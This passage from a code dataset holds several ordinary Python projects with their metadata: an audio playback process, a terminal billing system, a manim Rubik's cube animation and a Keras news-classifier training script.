"usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 99, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 99, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 102, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 102, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.negative", "line_number": 102, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 102, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 103, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 105, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 105, "usage_type": "name"}, {"api_name": "indico.web.util.jsonify_data", "line_number": 106, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.util.get_flat_section_positions_setup_data", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 117, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection.query.filter_by", "line_number": 129, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection.query", "line_number": 129, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection", "line_number": 129, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection.position", "line_number": 131, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection", "line_number": 131, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 136, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 136, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 137, "usage_type": "call"}]}
+{"seq_id": "73789106008", "text": "from multiprocessing import Process, Queue\nimport queue\nimport librosa\nimport pyaudio\nimport numpy\nfrom threading import Thread\nimport time\n\n# Audio is played in a separate process to ensure that playback is not impacted\n# by the UI. If audio is played from the same process as the UI, certain expensive operations\n# (like zooming in on the waveform) can cause the playback to stutter.\n\n# AudioState is the state required by the audio system to play audio.\nclass AudioState:\n def __init__(self, data = None, sampling_rate = None, play_rate = None):\n # This object can get quite big. If that's a problem, we'll instead transmit the filename.\n # In that case, the audio process will need to be responsible for modifications, e.g. play rate.\n self.data = data \n self.sampling_rate = sampling_rate\n self.play_rate = play_rate\n\nclass PlayAudioCommand:\n TYPE = \"play\"\n\n def __init__(self, start_timestamp, end_timestamp, current_timestamp, loop = True):\n self.start_timestamp = start_timestamp\n self.end_timestamp = end_timestamp\n self.current_timestamp = current_timestamp\n self.loop = loop\n\n def type(self):\n return PlayAudioCommand.TYPE\n\nclass StopAudioCommand:\n TYPE = \"stop\"\n\n def type(self):\n return StopAudioCommand.TYPE\n\nclass RestartAudioCommand:\n TYPE = \"restart\"\n\n def type(self):\n return RestartAudioCommand.TYPE\n\n# PlaybackState is the state of active audio playback which can be sent from the audio process back to the GUI process\n# for UI purposes.\nclass PlaybackState:\n def __init__(self, timestamp, playing):\n self.timestamp = timestamp\n\n # This is needed so that the audio process can communicate that audio has stopped playing, e.g.\n # when it reaches the end of the loop but looping is disabled.\n self.playing = playing\n\nclass AudioPlayer:\n\n def __init__(self):\n # The audio state queue is only ever written to by the GUI process and only ever read from\n # by the audio process to determine the state necessary to play audio.\n self.audio_state_queue = Queue()\n\n # The audio command queue is used by the GUI process to tell the audio process to play, stop,\n # etc. the audio.\n self.audio_command_queue = Queue()\n\n # The playback state queue is only ever written to by the audio process and only ever read from\n # by the GUI process to update the UI based on audio playback, e.g. move the cursor based on the \n # playback timestamp.\n self.playback_state_queue = Queue()\n\n # These values are set by the GUI process, and will eventually be propagated to the audio process.\n # There's no guarantee that these values are the same values currently being used by the audio\n # process. \n self.audio_state = None\n self.start_timestamp = None\n self.end_timestamp = None\n\n # This value can be set by the GUI process. Its value will be propagated to the audio process when audio playback begins.\n # While audio playback is occurring, this value will be updated by the audio process.\n self.current_timestamp = None\n\n self.ready = False\n self.playing = False\n self.loop = True\n\n def start(self):\n p = Process(target=audio_process, args=(self.audio_state_queue, self.audio_command_queue, self.playback_state_queue))\n p.start()\n\n t = Thread(target=self._playback_state_worker, args=[])\n t.start()\n\n def _playback_state_worker(self):\n while True:\n playback_state = get_if_present(self.playback_state_queue)\n if playback_state != None:\n if self.playing and not playback_state.playing:\n self.playing = False\n self.current_timestamp = playback_state.timestamp\n time.sleep(0.02)\n\n def set_audio_state(self, data, sampling_rate, play_rate):\n self.audio_state = AudioState(data, sampling_rate, play_rate)\n self.start_timestamp = 0.0\n self.end_timestamp = librosa.get_duration(y=data, sr=sampling_rate) * play_rate\n self.current_timestamp = 0.0\n self.ready = True\n self.audio_state_queue.put(self.audio_state)\n\n def set_start_timestamp(self, start_timestamp):\n self.start_timestamp = start_timestamp\n self._clamp_current_timestamp()\n\n def set_end_timestamp(self, end_timestamp):\n self.end_timestamp = end_timestamp\n self._clamp_current_timestamp()\n\n def set_current_timestamp(self, current_timestamp):\n self.current_timestamp = current_timestamp\n self._clamp_current_timestamp()\n\n def set_loop(self, loop):\n self.loop = loop\n\n def _clamp_current_timestamp(self):\n if self.current_timestamp < self.start_timestamp:\n self.current_timestamp = self.start_timestamp\n if self.current_timestamp > self.end_timestamp:\n self.current_timestamp = self.end_timestamp\n\n def play(self):\n # These should probably be synchronized in some way, but it will be safe as long as \n # AudioPlayer is only accessed from a single thread.\n self.playing = True\n self.audio_command_queue.put(PlayAudioCommand(self.start_timestamp, self.end_timestamp, self.current_timestamp, self.loop))\n\n def stop(self):\n self.playing = False\n self.audio_command_queue.put(StopAudioCommand())\n\n def restart(self):\n self.audio_command_queue.put(RestartAudioCommand())\n\ndef audio_process(audio_state_queue: Queue, audio_command_queue: Queue, playback_state_queue: Queue):\n\n stream = None\n audio_state = None\n\n p = pyaudio.PyAudio()\n while True:\n command = get_if_present(audio_command_queue)\n if command is not None and audio_state is not None:\n if command.type() == StopAudioCommand.TYPE:\n if stream is not None:\n stream.close()\n stream = None\n if command.type() == RestartAudioCommand.TYPE:\n if stream is not None:\n stream.close()\n stream = play_internal(\n p, \n playback_state_queue, \n command.start_timestamp, \n command.end_timestamp, \n command.current_timestamp, \n audio_state,\n )\n if command.type() == PlayAudioCommand.TYPE:\n stream = play_internal(\n p, \n playback_state_queue, \n command.start_timestamp, \n command.end_timestamp, \n command.current_timestamp, \n command.loop,\n audio_state,\n )\n update = get_if_present(audio_state_queue)\n if update is not None:\n audio_state = update\n p.terminate()\n\ndef get_if_present(q):\n try:\n return q.get_nowait()\n except queue.Empty:\n return None\n\ndef play_internal(p, playback_queue, start_timestamp, end_timestamp, current_timestamp, loop, audio_state):\n current_frame = librosa.time_to_samples(current_timestamp / audio_state.play_rate, sr=audio_state.sampling_rate)\n def pyaudio_callback(in_data, frame_count, time_info, status):\n nonlocal audio_state, start_timestamp, end_timestamp, current_timestamp, current_frame\n start_frame = librosa.time_to_samples(start_timestamp / audio_state.play_rate, sr=audio_state.sampling_rate)\n if current_frame < start_frame:\n # a bit hacky, we can't have other classes write to current_frame while music is playing\n # but we want to ensure that it's updated if e.g. the loop shifts\n current_frame = start_frame\n end_frame = librosa.time_to_samples(end_timestamp / audio_state.play_rate, sr=audio_state.sampling_rate)\n (data, current_frame) = extract_audio_data(audio_state.data, start_frame, end_frame, current_frame, frame_count, loop)\n current_timestamp = librosa.samples_to_time(current_frame, sr=audio_state.sampling_rate) * audio_state.play_rate\n if current_frame >= end_frame:\n playback_queue.put(PlaybackState(start_timestamp, False))\n elif playback_queue.empty():\n playback_queue.put(PlaybackState(current_timestamp, True))\n status = pyaudio.paContinue\n return (data, status)\n stream = p.open(rate=audio_state.sampling_rate, channels=len(audio_state.data.shape), format=pyaudio.paFloat32, output=True, stream_callback=pyaudio_callback)\n return stream\n\ndef extract_audio_data(data, start_frame, end_frame, current_frame, frame_count, loop):\n if len(data.shape) == 1:\n return extract_audio_data_mono(data, start_frame, end_frame, current_frame, frame_count, loop)\n else:\n (left, _) = extract_audio_data_mono(data[0], start_frame, end_frame, current_frame, frame_count, loop)\n (right, current_frame) = extract_audio_data_mono(data[1], start_frame, end_frame, current_frame, frame_count, loop)\n result = numpy.empty((left.size + right.size,), dtype=left.dtype)\n result[0::2] = left\n result[1::2] = right\n return (result, current_frame)\n\ndef extract_audio_data_mono(data, start_frame, end_frame, current_frame, frame_count, loop):\n new_start_frame = current_frame + frame_count\n extracted_data = []\n if end_frame != None and new_start_frame >= end_frame:\n if loop:\n extracted_data = numpy.concatenate((data[current_frame:end_frame], data[start_frame:(start_frame + new_start_frame - end_frame)]))\n current_frame = start_frame + new_start_frame - end_frame\n else:\n extracted_data = data[current_frame:end_frame]\n current_frame = end_frame\n else:\n extracted_data = data[current_frame:new_start_frame]\n current_frame += frame_count\n return (extracted_data, current_frame)", "repo_name": "athorwall/noodler", "sub_path": "noodler/audio/audio.py", "file_name": "audio.py", "file_ext": "py", "file_size_in_byte": 10030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "multiprocessing.Queue", "line_number": 61, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 65, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 70, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 88, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 91, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 101, "usage_type": "call"}, {"api_name": "librosa.get_duration", "line_number": 106, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 145, "usage_type": "name"}, {"api_name": "pyaudio.PyAudio", "line_number": 150, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 187, "usage_type": "attribute"}, {"api_name": "librosa.time_to_samples", "line_number": 191, "usage_type": "call"}, {"api_name": "librosa.time_to_samples", "line_number": 194, "usage_type": "call"}, {"api_name": "librosa.time_to_samples", "line_number": 199, "usage_type": "call"}, {"api_name": "librosa.samples_to_time", "line_number": 201, "usage_type": "call"}, {"api_name": "pyaudio.paContinue", "line_number": 206, "usage_type": "attribute"}, {"api_name": "pyaudio.paFloat32", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 227, "usage_type": "call"}]}
+{"seq_id": "11542271431", "text": "import os, json\r\nfrom datetime import datetime\r\ntry:\r\n from prettytable import PrettyTable\r\nexcept:\r\n os.system(\"python -m pip install -U prettytable\")\r\n\r\nclass Billing_System:\r\n def __init__(self):\r\n self.merchant_name = \"Supermarket\"\r\n self.carrybag_price = 10\r\n self.tax = 9\r\n self.store = json.load(open(\"./products.json\", \"r+\"))[\"products\"] \r\n \r\n def banner(self):\r\n os.system(f'cls & mode 140,24 && title Billing System ~ github.com/ISROHarsh' if os.name == \"nt\" else \"clear\")\r\n print('''\r\n \\t\\t\\t\\x1b[31m▄▄▄▄· \\x1b[0m▪ ▄▄▌ ▄▄▌ ▪ ▐ ▄ ▄▄ • \\x1b[31m.▄▄ · \\x1b[0m ▄· ▄▌.▄▄ · ▄▄▄▄▄▄▄▄ .• ▌ ▄ ·. \r\n \\t\\t\\t\\x1b[31m▐█ ▀█▪\\x1b[0m██ ██• ██• ██ •█▌▐█▐█ ▀ ▪ \\x1b[31m▐█ ▀. \\x1b[0m▐█▪██▌▐█ ▀. •██ ▀▄.▀··██ ▐███▪\r\n \\t\\t\\t\\x1b[31m▐█▀▀█▄\\x1b[0m▐█·██▪ ██▪ ▐█·▐█▐▐▌▄█ ▀█▄ \\x1b[31m▄▀▀▀█▄\\x1b[0m▐█▌▐█▪▄▀▀▀█▄ ▐█.▪▐▀▀▪▄▐█ ▌▐▌▐█·\r\n \\t\\t\\t\\x1b[31m██▄▪▐█\\x1b[0m▐█▌▐█▌▐▌▐█▌▐▌▐█▌██▐█▌▐█▄▪▐█ \\x1b[31m▐█▄▪▐█\\x1b[0m ▐█▀·.▐█▄▪▐█ ▐█▌·▐█▄▄▌██ ██▌▐█▌\r\n \\t\\t\\t\\x1b[31m·▀▀▀▀ \\x1b[0m▀▀▀.▀▀▀ .▀▀▀ ▀▀▀▀▀ █▪·▀▀▀▀ \\x1b[31m ▀▀▀▀ \\x1b[0m ▀ • ▀▀▀▀ ▀▀▀ ▀▀▀ ▀▀ █▪▀▀▀\r\n ''')\r\n \r\n def menu(self):\r\n print('''\\n\\n\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Main menu\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m1\\u001b[0m] Show items\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m2\\u001b[0m] Sale\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m3\\u001b[0m] Exit''')\r\n try:\r\n choice = int(input('''\r\n\\u001b[0m[\\x1b[\\x1b[38;5;63m?\\u001b[0m] Choice> '''))\r\n if choice == 1:\r\n self.show_items()\r\n elif choice == 2:\r\n self.sale()\r\n elif choice == 3:\r\n quit()\r\n else:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Please enter a valid choice (1,2,3)\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.menu()\r\n except Exception as e:\r\n print(f\"[\\x1b[31m!\\x1b[0m] {e.args}\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.menu()\r\n \r\n def add_items(self):\r\n while True:\r\n try:\r\n product_name = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m*\\u001b[0m] Product name> ')\r\n if not product_name:\r\n with open(\"./products.json\", \"r+\") as db:\r\n data = json.load(db)\r\n data[\"products\"].append(product_data)\r\n db.seek(0)\r\n json.dump(data, db, indent = 4)\r\n break\r\n product_id = int(self.store[-1][\"product_id\"])\r\n product_price = int(input('\\u001b[0m[\\x1b[\\x1b[38;5;63m*\\u001b[0m] Product price> '))\r\n product_id += 1\r\n product_data = {\"product_id\": product_id, \"name\": product_name, \"price\": product_price}\r\n except KeyboardInterrupt:\r\n self.banner()\r\n self.menu()\r\n except Exception as e:\r\n print(f\"\\n[\\x1b[31m!\\x1b[0m] {e.args}\")\r\n input(f'\\n\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.show_items()\r\n \r\n def show_items(self):\r\n try:\r\n self.banner()\r\n self.store = json.load(open(\"./products.json\", \"r+\"))[\"products\"]\r\n products = PrettyTable(padding_width=5)\r\n products.field_names = [\"Product id\", \"Item name\", \"Price (Rs)\"]\r\n for i in range(len(self.store)):\r\n products.add_row([self.store[i]['product_id'], self.store[i]['name'], self.store[i]['price']])\r\n print(products)\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ENTER to add new items or CTRL+C to return main menu')\r\n self.add_items()\r\n except KeyboardInterrupt:\r\n self.banner()\r\n self.menu()\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.menu()\r\n\r\n def sale(self):\r\n self.banner()\r\n try:\r\n print('\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Customer details')\r\n print('\\u001b[0m[\\x1b[\\x1b[38;5;63m>\\u001b[0m] Use CTRL+C to return main menu')\r\n self.customer_name = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m+\\u001b[0m] Customer name> ')\r\n if not self.customer_name:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Customer name cannot be empty\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n self.mobile_number = int(input('\\u001b[0m[\\x1b[\\x1b[38;5;63m+\\u001b[0m] Mobile number> '))\r\n if len(str(self.mobile_number)) < 10 or len(str(self.mobile_number)) > 10:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Enter 10 digit mobile number\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n self.address = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m+\\u001b[0m] Address> ')\r\n if not self.address:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Address cannot be empty\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n self.bag = input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m+\\u001b[0m] Carry bag Rs {self.carrybag_price} (Y/n)> ').upper()\r\n if self.bag not in [\"Y\", \"N\", \"YES\", \"NO\"]:\r\n print(f\"[\\x1b[31m!\\x1b[0m] Please enter a valid choice (Y/n)\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n self.invoice()\r\n except KeyboardInterrupt:\r\n self.banner()\r\n self.menu()\r\n except Exception as e:\r\n print(f\"[\\x1b[31m!\\x1b[0m] {e.args}\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to continue')\r\n self.banner()\r\n self.sale()\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to return main menu')\r\n self.banner()\r\n self.menu() \r\n \r\n def invoice(self):\r\n self.banner()\r\n print('\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Invoice')\r\n print('\\u001b[0m[\\x1b[\\x1b[38;5;63m>\\u001b[0m] Press ANY KEY when done')\r\n serial_no = 1\r\n invoice = PrettyTable(padding_width=3)\r\n invoice.field_names = [\"Serial No\", \"Item\", \"Quantity (Kg)\", \"Price\"]\r\n total = 0\r\n if self.bag:\r\n total += self.carrybag_price\r\n while True:\r\n try:\r\n product_id = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m*\\u001b[0m] Product id> ')\r\n dtime = datetime.now().strftime(\"%d %b %Y At %I:%M %p\")\r\n if not product_id:\r\n self.banner()\r\n out = f'''\r\n+---------------+-----------+-------------------+-------------+\r\n\\t\\t\\t\\t\\t\\t{self.merchant_name} \r\n+---------------+-----------+-------------------+-------------+\r\n > Customer name: {self.customer_name} \r\n > Phone number: {self.mobile_number} \r\n > Address: {self.address} \r\n > Carry-bag opted: {self.bag}\r\n > Date: {dtime}\r\n{str(invoice)}\r\n +---------------+-----------+------------------+--------------+\r\n | | Total | Rs {total}\r\n | | GST | Rs {round(self.tax/100*total)}\r\n | | Grand Total | Rs {total + round(self.tax/100*total)}\r\n+---------------+-----------+-------------------+--------------+\r\n ''' \r\n print(out)\r\n with open(f\"invoice-{datetime.now().strftime('%d%m%y%H%M')}.txt\", \"a+\") as invoice_file:\r\n invoice_file.write(out)\r\n break\r\n quantity = input('\\u001b[0m[\\x1b[\\x1b[38;5;63m*\\u001b[0m] Quantity> ')\r\n total += self.store[int(product_id)][\"price\"] * int(quantity)\r\n invoice.add_row([serial_no, self.store[int(product_id)]['name'], quantity, self.store[int(product_id)]['price'] * int(quantity)])\r\n serial_no += 1\r\n except Exception as e:\r\n print(f\"[\\x1b[31m!\\x1b[0m] {e.args}\")\r\n input(f'\\u001b[0m[\\x1b[\\x1b[38;5;63m#\\u001b[0m] Press ANY KEY to return main menu')\r\n self.banner()\r\n self.invoice()\r\n \r\nif __name__ == \"__main__\":\r\n client = Billing_System()\r\n client.banner()\r\n client.menu()\r\n", "repo_name": "ISROHarsh/Billing-system", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 9442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.system", "line_number": 6, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "os.system", "line_number": 16, "usage_type": "call"}, {"api_name": "os.name", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 57, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 60, "usage_type": "call"}, {"api_name": "json.load", "line_number": 78, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 79, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 140, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 148, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 168, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 168, "usage_type": "name"}]}
+{"seq_id": "5098543207", "text": "from manim.animation.animation import Animation\nfrom manim.constants import PI\nfrom manim.mobject.types.vectorized_mobject import VGroup\nfrom .cube_utils import get_axis_from_face\n\nclass CubeMove(Animation):\n def __init__(self, mobject, face, **kwargs):\n self.axis = get_axis_from_face(face[0])\n self.face = face\n self.angle = PI/2 if (\"R\" in face or \"F\" in face or \"D\" in face) else -PI/2\n self.angle = self.angle if \"2\" not in face else self.angle*2\n self.angle = -self.angle if \"'\" in face else self.angle\n super().__init__(mobject, **kwargs)\n\n def create_starting_mobject(self):\n starting_mobject = self.mobject.copy()\n if starting_mobject.indices == {}:\n starting_mobject.set_indices()\n return starting_mobject\n\n def interpolate_mobject(self, alpha):\n self.mobject.become(self.starting_mobject)\n \n VGroup(*self.mobject.get_face(self.face[0])).rotate(\n alpha * self.angle,\n self.axis\n )\n\n def finish(self):\n super().finish()\n self.mobject.adjust_indices(self.mobject.get_face(self.face[0], False))", "repo_name": "WampyCakes/manim-rubikscube", "sub_path": "manim_rubikscube/cube_animations.py", "file_name": "cube_animations.py", "file_ext": "py", "file_size_in_byte": 1151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "32", "api": [{"api_name": "manim.animation.animation.Animation", "line_number": 6, "usage_type": "name"}, {"api_name": "cube_utils.get_axis_from_face", "line_number": 8, "usage_type": "call"}, {"api_name": "manim.constants.PI", "line_number": 10, "usage_type": "name"}, {"api_name": "manim.mobject.types.vectorized_mobject.VGroup", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "74870470492", "text": "import numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport pickle\nimport shutil\n\nfrom tensorflow import keras\nfrom sklearn.model_selection import train_test_split\nfrom preprocessor import PreProcessor\nfrom os import mkdir\nfrom os.path import join, normpath, dirname\nfrom sklearn import metrics\n\nREMOVE_PREVIOUS_MODEL = True\nMODEL_OUTPUT_DIR = normpath(join(dirname(__file__), '../model/'))\nDATA_SET_FILE = normpath(join(dirname(__file__), '../data/simple_data/labeled_news.csv'))\nMODEL_FILE = normpath(join(dirname(__file__), '../model/keras_model.h5'))\nTOKEN_FILE = normpath(join(dirname(__file__), '../model/tokenizer'))\nVARS_FILE = normpath(join(dirname(__file__), '../model/vars'))\n\nMAX_DOCUMENT_LENGTH = 200\nVOCAB_SIZE = 20000\nEMBED_DIM = 50\nN_CLASSES = 8\n\nLSTM_LAYERS = 100\nFILTER_SIZE = 64\nPOOL_SIZE = 4\n\nif REMOVE_PREVIOUS_MODEL:\n # Remove old model\n shutil.rmtree(MODEL_OUTPUT_DIR)\n mkdir(MODEL_OUTPUT_DIR)\n\n# read data\ndf = pd.read_csv(DATA_SET_FILE, header=None)\nX, y = df[1], df[0]\n\n# class range from 0 ~ N_CLASSES-1\ny = y.apply(lambda x: x-1)\n# preprocess\nX = X.apply(lambda x: PreProcessor.clean_text(x))\n\n# split train and test data\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n\n# tokenizer\ntokenizer = tf.keras.preprocessing.text.Tokenizer(num_words=VOCAB_SIZE)\ntokenizer.fit_on_texts(x_train)\n\nx_train = tokenizer.texts_to_sequences(x_train)\nx_test = tokenizer.texts_to_sequences(x_test)\n\nx_train = tf.keras.preprocessing.sequence.pad_sequences(x_train, maxlen=MAX_DOCUMENT_LENGTH)\nx_test = tf.keras.preprocessing.sequence.pad_sequences(x_test, maxlen=MAX_DOCUMENT_LENGTH)\n\n# save tokenizer\nwith open(TOKEN_FILE, 'wb') as handle:\n pickle.dump(tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n# save vocab size\nwith open(VARS_FILE, 'wb') as handle:\n vars = {\n 'MAX_DOCUMENT_LENGTH': MAX_DOCUMENT_LENGTH,\n 'VOCAB_SIZE': VOCAB_SIZE,\n 'EMBED_DIM': EMBED_DIM,\n 'N_CLASSES': N_CLASSES\n }\n pickle.dump(vars, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.Embedding(VOCAB_SIZE, EMBED_DIM, input_length=MAX_DOCUMENT_LENGTH))\nmodel.add(keras.layers.Conv1D(FILTER_SIZE, EMBED_DIM, activation='relu'))\nmodel.add(keras.layers.MaxPooling1D(pool_size=POOL_SIZE))\nmodel.add(keras.layers.LSTM(LSTM_LAYERS, dropout=0.2, recurrent_dropout=0.2))\nmodel.add(keras.layers.Dense(N_CLASSES, activation='softmax'))\nmodel.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.summary()\n\nmodel.fit(x_train, y_train, epochs=3)\n\naccr = model.evaluate(x_test,y_test)\nprint('Test set\\n Loss: {:0.3f}\\n Accuracy: {:0.3f}'.format(accr[0],accr[1]))\n\nmodel.save(MODEL_FILE)\ndel model\n", "repo_name": "yitongw2/Tap-News", "sub_path": "news_classifier/trainer/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 2766, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.normpath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 32, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "preprocessor.PreProcessor.clean_text", "line_number": 42, "usage_type": "call"}, {"api_name": "preprocessor.PreProcessor", "line_number": 42, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.text.Tokenizer", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.sequence.pad_sequences", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.sequence.pad_sequences", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 59, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 69, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 71, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 72, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 73, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MaxPooling1D", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 74, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 75, "usage_type": "call"}, {"api_name": 